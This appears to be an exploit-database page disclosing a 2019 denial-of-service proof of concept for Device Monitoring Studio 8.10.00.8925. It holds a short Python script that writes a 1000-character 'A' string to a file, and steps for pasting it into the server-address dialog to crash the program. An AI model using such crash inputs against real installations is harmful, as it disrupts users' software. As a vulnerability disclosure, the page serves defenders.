header-logo
Suggest Exploit
vendor:
Device Monitoring Studio
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Device Monitoring Studio
Affected Version From: 8.10.00.8925
Affected Version To: 8.10.00.8925
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Service Pack 1 x64
2019

Device Monitoring Studio 8.10.00.8925 – Denial of Service (PoC)

Device Monitoring Studio 8.10.00.8925 is vulnerable to a denial of service attack when a maliciously crafted string is sent to the application. This can be done by running a python code, copying the content of a text file to the clipboard, and then pasting it into the application. This will cause the application to crash.

Mitigation:

Ensure that all applications are up to date and patched with the latest security updates.
Source

Exploit-DB raw data:

#Exploit Title: Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-02-04
#Tested Version: 8.10.00.8925
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: Device_Monitoring_Studio_8.10.00.8925.py
#2.- Open code.txt and copy content to clipboard
#3.- Open Device Monitoring Studio
#4.- Select "Tools" > "Connect to New Server"
#5.- Select "Enter the name server or address" and Paste Clipboard
#6.- Select "Ok"
#7.- Crashed

cod = "\x41" * 1000

f = open('code.txt', 'w')
f.write(cod)
f.close()